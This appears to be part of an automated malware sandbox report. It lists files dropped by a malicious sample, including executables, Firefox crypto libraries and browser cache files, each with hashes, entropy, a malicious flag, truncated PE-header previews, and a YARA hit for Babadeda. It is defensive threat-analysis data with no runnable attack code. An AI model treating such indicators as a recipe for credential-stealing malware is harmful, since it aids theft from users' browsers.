MD5:	4721DC7BFD66731DCE76799D10B626F5
SHA1:	247DA9E9C299BF2E4F21CF13347856E7E4FA8322
SHA-256:	343EACE3990977346185059350EAE825A093D5EEC1D6983DDB6D7F66682F28E6
SHA-512:	CCD08E0B3C4B8B2B39F80A7A62E448DA4592B072C2074358014FA6EEC0C06E4B30E3A5F239640CA030FF5C9E1E37DA9951358B95F18FC51FEE2451920A24D6AC
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".R.m.E.G.W.I.f.f.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.b.x.8.d.C.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\enter[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1909760
Entropy (8bit):	7.949641205972528
Encrypted:	false
SSDEEP:	49152:tlkWk0JDpvefwG7tfhTkSkB6K4uzolV8ApUS3xCMBfkkECS:taWvnvH0fhTsY7J3xCMR/
MD5:	2AF5EB9FB318C9A454DE54914E121031
SHA1:	FCBAEA817B8EB0D63BA7B31804BE2353D564BA93
SHA-256:	589EB31A43D44FE275C70BFC3F592965B9236B59645A7ED633BBEC66526D64AB
SHA-512:	5873029940644909567F97A6D4C78D78064E7FFF22CC5B90FDA5F8C31017B30CA7DD2FC7672F7AB7460EE49D6154ED23EF5A52EA0077D09347B0B9CA3E9839F4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................K...........@.......................... L......:....@.................................W...k...........................4.K...............................K..................................................... . ............................@....rsrc...............................@....idata ............................@... . +.........................@...usoriijt......1.....................@...ymfuwjgb......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1898496
Entropy (8bit):	7.950130111317579
Encrypted:	false
SSDEEP:	49152:5qE17IghRPKUd2LI/WYW+jNTxjgafw8TfzYBgx1ITA:5HdkRnSNTBg2/ug3WA
MD5:	8EF54B7689AF3A0FE5028BC42964BB26
SHA1:	DEBCB0EA69E4330873F281B0D9B34D15FC513ABC
SHA-256:	78305C8B5E8EAD6989A0AF09FC6ED8F2FF1B246C0487DFA78FB5B155B554CAE9
SHA-512:	8B2EE0C290A48F826BACAEAF949D7335B14F65DC8967D0BCB05AD386FDA9FAF5D6D016D66CE202CD7BE202EAF1981B6B17BB60DAE33DC085F28AAB9BE9D3986B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................J...........@...........................K..........@.................................W...k.............................J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .0*.........................@...qzeqbxes......0.....................@...qgghuozc......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	250880
Entropy (8bit):	6.0281010030358635
Encrypted:	false
SSDEEP:	3072:QLCWSJzpVnjAyfwr2lY+EKv8QKH/se+lhjWDgKe2yhKVtFRX3vPTZY:PjJzbTg22wKHke+WDGyd3v
MD5:	45FD30020C12378C242DC90687EDC24C
SHA1:	934CD43FF8BD35E77D7DF2CBC3AA5D96B672E4BF
SHA-256:	F4A7D43DC4CDF21CC7A58AF7C66386CEA1616658F15B996691FBB85A7CB06B9D
SHA-512:	9122D305C9850DDDDF6CE60E03988DDFC60C29FF36D029E17FABBE3D1BC568433F1762E730852D7281021C9464874DEE7F6DC5D4293CE5A99F9E4E587BF742F2
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@g.s... ... ... kpQ ... kpd ... kpP `.. .~i ... ... v.. kpU ... kp` ... kpg ... Rich... ........PE..L...{..d.....................x....... .......0....@..........................`......R@.......................................X..x...................................\Y...............................S..@............0...............................text............................... ..`.rdata...2...0...4... ..............@..@.data........p.......T..............@....xipewav.............0..............@..@.gata................4..............@....rsrc................8..............@..@................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91648
Entropy (8bit):	6.753443800102075
Encrypted:	false
SSDEEP:	1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfvxwTQOq:Hq6+ouCpk2mpcWJ0r+QNTBfv6T2
MD5:	2DE90BE7036903B103DCAA9B3CF3E2E8
SHA1:	F5BBC22473AE0C4F7536BFD531465B518B58A5D6
SHA-256:	64AC805D6B90DD9585E787A6F3169757B5A610940B5A74FC0453094AF727D251
SHA-512:	DDED961AF68F44794D53AC8F9C45FF3BE4B0B36D5270B81E0ACB769BB5423021DB58D52C87B7578B53F2AA454C8FCA0CC31313E593A8C41F409F2E1073B07554
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b.@]...............2.....V...............0....@.........................................................................\|q......................................................................................pt..,............................code....7.......8.................. ..`.text........P.......<.............. ..`.rdata...3...0...4..................@..@.data...,....p.......D..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\activity-stream.discovery_stream.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	5.584588439236419
Encrypted:	false
SSDEEP:	384:Oyau/w+x6w+xqDFrO3MPQRp+KAzze/DoEjGYTG8Om2PLr5EMf:Oyd/TITEDFrO3MPQZ+zkDoq4rhf
MD5:	5C4A24933F9F6B7C45A0C88DF2198E09
SHA1:	1F62E3F752BA637FE035CE0C8F2E3FBA89A9489A
SHA-256:	A5BB4505335E24790D4A38FB16154D45F4084966C3CFE4570A3009DAACF4CEFE
SHA-512:	733A55FEEED262EF39A4F6E27E468A505D901A524ED6D2CFB348577828E905124F8A5D579328AFCE17AF15EADAF1146A88677D4692FC02A333EB6BD6278D3561
Malicious:	false
Preview:	{"spocs":{"lastUpdated":1722022047991,"spocs":{"settings":{"feature_flags":{"collections":false,"spoc_v2":true},"spocsPerNewTabs":1,"domainAffinityParameterSets":{"default":{"combinedDomainFactor":0.5,"frequencyFactor":0.5,"itemScoreFactor":1,"multiDomainBoost":0,"perfectCombinedDomainScore":2,"perfectFrequencyVisits":10,"recencyFactor":0.5},"fully-personalized":{"combinedDomainFactor":0.5,"frequencyFactor":0.5,"itemScoreFactor":0.01,"multiDomainBoost":0,"perfectCombinedDomainScore":2,"perfectFrequencyVisits":10,"recencyFactor":0.5},"fully-personalized-domains":{"combinedDomainFactor":0.5,"frequencyFactor":0.5,"itemScoreFactor":0.01,"multiDomainBoost":0,"perfectCombinedDomainScore":10,"perfectFrequencyVisits":1,"recencyFactor":0.5}},"timeSegments":[{"id":"week-1","startTime":432000,"endTime":0,"weightPosition":1},{"id":"week-2","startTime":864000,"endTime":432000,"weightPosition":1},{"id":"week-3","startTime":1296000,"endTime":864000,"weightPosition":1},{"id":"week-4","startTime":17280

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\activity-stream.discovery_stream.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	5.584588439236419
Encrypted:	false
SSDEEP:	384:Oyau/w+x6w+xqDFrO3MPQRp+KAzze/DoEjGYTG8Om2PLr5EMf:Oyd/TITEDFrO3MPQZ+zkDoq4rhf
MD5:	5C4A24933F9F6B7C45A0C88DF2198E09
SHA1:	1F62E3F752BA637FE035CE0C8F2E3FBA89A9489A
SHA-256:	A5BB4505335E24790D4A38FB16154D45F4084966C3CFE4570A3009DAACF4CEFE
SHA-512:	733A55FEEED262EF39A4F6E27E468A505D901A524ED6D2CFB348577828E905124F8A5D579328AFCE17AF15EADAF1146A88677D4692FC02A333EB6BD6278D3561
Malicious:	false
Preview:	{"spocs":{"lastUpdated":1722022047991,"spocs":{"settings":{"feature_flags":{"collections":false,"spoc_v2":true},"spocsPerNewTabs":1,"domainAffinityParameterSets":{"default":{"combinedDomainFactor":0.5,"frequencyFactor":0.5,"itemScoreFactor":1,"multiDomainBoost":0,"perfectCombinedDomainScore":2,"perfectFrequencyVisits":10,"recencyFactor":0.5},"fully-personalized":{"combinedDomainFactor":0.5,"frequencyFactor":0.5,"itemScoreFactor":0.01,"multiDomainBoost":0,"perfectCombinedDomainScore":2,"perfectFrequencyVisits":10,"recencyFactor":0.5},"fully-personalized-domains":{"combinedDomainFactor":0.5,"frequencyFactor":0.5,"itemScoreFactor":0.01,"multiDomainBoost":0,"perfectCombinedDomainScore":10,"perfectFrequencyVisits":1,"recencyFactor":0.5}},"timeSegments":[{"id":"week-1","startTime":432000,"endTime":0,"weightPosition":1},{"id":"week-2","startTime":864000,"endTime":432000,"weightPosition":1},{"id":"week-3","startTime":1296000,"endTime":864000,"weightPosition":1},{"id":"week-4","startTime":17280

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842025116 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8645
Entropy (8bit):	7.714687355086127
Encrypted:	false
SSDEEP:	192:nSWknE/Cr9dcuT8ejBclpzSLLPMb6hAp4YHQ6z8gq7ryPEZlB:S9nE/C/ci8WBcanMbgAVHYDrvF
MD5:	178E2B38A09A86F6CCFFF4645FEDA3E6
SHA1:	4CFD0EDB47CFFEB0ACCD8627AD9A0C9DA450CBC7
SHA-256:	6552866B8280BC8F9F6230013BE66968224C421BC91ECFC814B9C7FA059AB1C6
SHA-512:	71040F4BC23BFEBC12319FBBFD5B52C813F3F5D028F3E70B2121636EA12EDEF44E72C59284E3BA24BF99F48A41F647FF8C666EAF3382356E8BBB26F93909A8F4
Malicious:	false
Preview:	.PNG........IHDR.............L\......pHYs................TiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="adobe:docid:photoshop:82984115-b8d2-4341-b236-73eff1d64353" xmpMM:InstanceID="xmp.iid:59b07155-5784-48cc-a14f-40510d02e139" xmpMM:OriginalDocumentID="4548C2FC27AF2E4E650490E1CF51E97A" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCP

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842025116.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8645
Entropy (8bit):	7.714687355086127
Encrypted:	false
SSDEEP:	192:nSWknE/Cr9dcuT8ejBclpzSLLPMb6hAp4YHQ6z8gq7ryPEZlB:S9nE/C/ci8WBcanMbgAVHYDrvF
MD5:	178E2B38A09A86F6CCFFF4645FEDA3E6
SHA1:	4CFD0EDB47CFFEB0ACCD8627AD9A0C9DA450CBC7
SHA-256:	6552866B8280BC8F9F6230013BE66968224C421BC91ECFC814B9C7FA059AB1C6
SHA-512:	71040F4BC23BFEBC12319FBBFD5B52C813F3F5D028F3E70B2121636EA12EDEF44E72C59284E3BA24BF99F48A41F647FF8C666EAF3382356E8BBB26F93909A8F4
Malicious:	false
Preview:	.PNG........IHDR.............L\......pHYs................TiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="adobe:docid:photoshop:82984115-b8d2-4341-b236-73eff1d64353" xmpMM:InstanceID="xmp.iid:59b07155-5784-48cc-a14f-40510d02e139" xmpMM:OriginalDocumentID="4548C2FC27AF2E4E650490E1CF51E97A" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCP

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842026026 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	9061
Entropy (8bit):	7.967771593793241
Encrypted:	false
SSDEEP:	192:hEEUanuJpFBl+d7+JHi7K6T8EXDqAjGUXPrvPUnxwhMlq0qA07:hEfanspbl+5+VihxXLqUgxUzx
MD5:	A0EC439ECA4879CD40F47343A08161DF
SHA1:	CC1204D4236DB1DC101B45185D3964F38579DD13
SHA-256:	4AC76152AA568990FCBF49AB50C518BDC5DACC4423894DBD8905E65EDF8916E9
SHA-512:	7B1B0E8B4BF412B8F946F90CA5146BBB01C3DF1ADFE78451AEE929B1648C4772F6BF7F08001CAE75FE1F1922A5B54A74302D04634724EDB0B70DF0C539E528FF
Malicious:	false
Preview:	.PNG........IHDR.............L\....#,IDATx..}..[.q...`f..<.....x...`.`.`.....u\...]%U.x..R...(v..b......)VY>tXZ...D.V..%9$..{...q..t....0.,..vk.\|.^........._w..?...K.[..D^S........~..b......Y..Yp..1..-.......Z...V.....Wc.......i...o...w`..G....K..xeUA..C...xG..$).-..VR.._.wYB.....-.\.....I.w....X......5..Z......#x."/).$UQ'eY..z...L......1...u.....=..a.0.$.'.;..S....S...c...~..A.R.=3.^e.._.... c. r?...#......x.< ...^......>.d?z_.W.?\[.......VJ?]-..R.q.......+.K?.\../?s<V....PRd..7.I..3../0..w.7........M.....s...^0o..Z.}c....=;5q,......h..._O0....2....YY...-.mr....os.o..f...;.......\|c~.`.P,..a=kd..k...@=X..c.>...<.q.M#...p..F..lY.....m..k..?<0q2v.......l.K.%..c..U.....,...c..\..n.\..;<.4..cu\.j...;(.8.{.....]....n.I8.I.\|../^./.l8F.5...].A.-..8.c.V..-.hy...O..:..Hl.._.%...$.+....O..7K-.G..{..6L.E-?.q.67qO.f.0.s...gf(J........7.H$..&..=..?={.....od.F~;ol[V.....C........._8s.....q\|=X..}. p.(..?,..V..q.....fn......n.ig...m..n.g...c..g

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842026026.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	9061
Entropy (8bit):	7.967771593793241
Encrypted:	false
SSDEEP:	192:hEEUanuJpFBl+d7+JHi7K6T8EXDqAjGUXPrvPUnxwhMlq0qA07:hEfanspbl+5+VihxXLqUgxUzx
MD5:	A0EC439ECA4879CD40F47343A08161DF
SHA1:	CC1204D4236DB1DC101B45185D3964F38579DD13
SHA-256:	4AC76152AA568990FCBF49AB50C518BDC5DACC4423894DBD8905E65EDF8916E9
SHA-512:	7B1B0E8B4BF412B8F946F90CA5146BBB01C3DF1ADFE78451AEE929B1648C4772F6BF7F08001CAE75FE1F1922A5B54A74302D04634724EDB0B70DF0C539E528FF
Malicious:	false
Preview:	.PNG........IHDR.............L\....#,IDATx..}..[.q...`f..<.....x...`.`.`.....u\...]%U.x..R...(v..b......)VY>tXZ...D.V..%9$..{...q..t....0.,..vk.\|.^........._w..?...K.[..D^S........~..b......Y..Yp..1..-.......Z...V.....Wc.......i...o...w`..G....K..xeUA..C...xG..$).-..VR.._.wYB.....-.\.....I.w....X......5..Z......#x."/).$UQ'eY..z...L......1...u.....=..a.0.$.'.;..S....S...c...~..A.R.=3.^e.._.... c. r?...#......x.< ...^......>.d?z_.W.?\[.......VJ?]-..R.q.......+.K?.\../?s<V....PRd..7.I..3../0..w.7........M.....s...^0o..Z.}c....=;5q,......h..._O0....2....YY...-.mr....os.o..f...;.......\|c~.`.P,..a=kd..k...@=X..c.>...<.q.M#...p..F..lY.....m..k..?<0q2v.......l.K.%..c..U.....,...c..\..n.\..;<.4..cu\.j...;(.8.{.....]....n.I8.I.\|../^./.l8F.5...].A.-..8.c.V..-.hy...O..:..Hl.._.%...$.+....O..7K-.G..{..6L.E-?.q.67qO.f.0.s...gf(J........7.H$..&..=..?={.....od.F~;ol[V.....C........._8s.....q\|=X..}. p.(..?,..V..q.....fn......n.ig...m..n.g...c..g

C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\v6zchhhv.default-release\settings\main\quicksuggest\icon-161351842026220 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13554
Entropy (8bit):	7.967688317652606
Encrypted:	false
SSDEEP:	384:FqwBoZeYL8zkQCs0y/ON6ep0vwCRk4Yf93+I0SihTrXjA:M32zkJ62N6euwCRIkDSihTrk
MD5:	55437681F19C00A1E08EDA205C1004D5
SHA1:	959213FA8938973B1E5A02D6CD12B0A82D2D7E48
SHA-256:	78EBA5F35AE77298800F3A5860FED08D0F9656EB89B80D4C651F2B3E6A51D0BC
SHA-512:	C0E168781A311253268ABCFB60B0305B07126DDEA75ECD7E7B48617D7A9CAF5F12A5D0EFCFA34F2E43CB914FE45343961DE15E45E71AB6EFDF3D6B3354AB223A
Malicious:	false
